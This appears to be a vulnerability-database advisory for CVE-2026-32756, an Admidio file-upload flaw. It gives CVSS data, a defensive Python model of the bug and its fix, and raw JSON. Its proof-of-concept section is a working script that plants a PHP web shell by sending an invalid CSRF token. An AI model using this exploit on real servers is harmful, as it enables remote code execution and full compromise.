Security Vulnerability Report
CVE-2026-32756 CVSS 8.8 HIGH

CVE-2026-32756

Published: 2026-03-20 00:16:17
Last Modified: 2026-03-23 16:51:44

Description

Admidio is an open-source user management solution. Versions 5.0.6 and below contain a critical unrestricted file upload vulnerability in the Documents & Files module. Due to a design flaw in how CSRF token validation and file extension verification interact within UploadHandlerFile.php, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution on the server, resulting in full server compromise, data exfiltration, and lateral movement. This issue has been fixed in version 5.0.7.
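As an added illustration (not Admidio's code, which the advisory does not quote), the following Python models the interaction the description attributes to UploadHandlerFile.php: a handler whose extension allowlist is only consulted on the branch taken when the CSRF token validates, beside a hardened handler that fails closed on the token check and applies the allowlist on every path that can store a file, plus an audit helper for an existing upload directory. The allowlist, function names and the exact shape of the flawed branch are assumptions.

```python
import os
import secrets

# Constructed allowlist for a documents module (an assumption; the
# advisory does not quote Admidio's actual list).
ALLOWED_EXTENSIONS = {"pdf", "txt", "jpg", "jpeg", "png", "gif", "docx", "xlsx", "zip"}


def extension_allowed(filename: str) -> bool:
    """Allowlist check on the final extension: case-insensitive, and names
    with no extension or a trailing dot are rejected rather than passed."""
    base = os.path.basename(filename.strip())
    if not base or base.endswith(".") or "." not in base:
        return False
    return base.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def flawed_handler(session_token: str, submitted_token: str, filename: str) -> str:
    """Assumed model of the pre-5.0.7 interaction: the extension check lives
    only on the branch taken when the CSRF token validates, so an invalid token
    reaches a fallback path that stores the file without ever checking it."""
    if secrets.compare_digest(session_token, submitted_token):
        if not extension_allowed(filename):
            return "rejected: extension"
        return "stored"
    # Fallback path for a bad token (the assumed design flaw): the token
    # failure is noted but the upload is still stored, with no allowlist check.
    return "stored"


def hardened_handler(session_token: str, submitted_token: str, filename: str) -> str:
    """Fail closed: an invalid CSRF token aborts before anything else, and the
    allowlist check runs on every path that can store a file."""
    if not secrets.compare_digest(session_token, submitted_token):
        return "rejected: csrf"
    if not extension_allowed(filename):
        return "rejected: extension"
    return "stored"


def audit_upload_dir(filenames: list[str]) -> list[str]:
    """Defender check: given a listing of an upload directory, return the names
    that would not pass the allowlist, i.e. candidates for past abuse."""
    return sorted(f for f in filenames if not extension_allowed(f))
```

Running `audit_upload_dir` over a listing of the instance's upload directory is a quick way to check whether the flaw was exercised before the upgrade to 5.0.7.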

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (network, low complexity, low privileges, no user interaction, scope unchanged, high confidentiality/integrity/availability impact)
Weakness: CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
target_url = "http://example.com/admidio/adm_program/modules/documents-files/upload_handler_file.php"
attacker_cookie = {"PHPSESSID": "<authenticated_session_id>"}  # Requires valid login

# Malicious PHP payload
php_payload = "<?php system($_GET['cmd']); ?>"

# Exploit Logic: Submit file with an invalid/missing CSRF token to bypass extension check
files = {
    'userfile': ('exploit.php', php_payload, 'application/x-php')
}

# Sending an invalid CSRF token triggers the bypass logic
data = {
    'csrf_token': 'INVALID_TOKEN_12345'
}

response = requests.post(target_url, files=files, data=data, cookies=attacker_cookie)

if response.status_code == 200 and "success" in response.text.lower():
    print("[+] Exploit successful! File uploaded.")
    print("[+] Access your shell at: /adm_my_files/exploit.php?cmd=whoami")
else:
    print("[-] Exploit failed.")
    print(response.text)

References

https://github.com/Admidio/admidio/releases/tag/v5.0.7 (Patch, Product)
https://github.com/Admidio/admidio/security/advisories/GHSA-95cq-p4w2-32w5 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32756", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:16.763", "lastModified": "2026-03-23T16:51:44.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Versions 5.0.6 and below contain a critical unrestricted file upload vulnerability in the Documents & Files module. Due to a design flaw in how CSRF token validation and file extension verification interact within UploadHandlerFile.php, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution on the server, resulting in full server compromise, data exfiltration, and lateral movement. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. Las versiones 5.0.6 e inferiores contienen una crítica vulnerabilidad de carga de archivos sin restricciones en el módulo Documentos y Archivos. Debido a un fallo de diseño en cómo la validación del token CSRF y la verificación de la extensión de archivo interactúan dentro de UploadHandlerFile.php, un usuario autenticado con permisos de carga puede eludir las restricciones de extensión de archivo al enviar intencionadamente un token CSRF no válido. Esto permite la carga de tipos de archivo arbitrarios, incluyendo scripts PHP, lo que puede conducir a la ejecución remota de código en el servidor, resultando en un compromiso total del servidor, exfiltración de datos y movimiento lateral. Este problema ha sido solucionado en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.7", "matchCriteriaId": "3347E657-D132-4D87-A355-391136657A27"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-95cq-p4w2-32w5", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}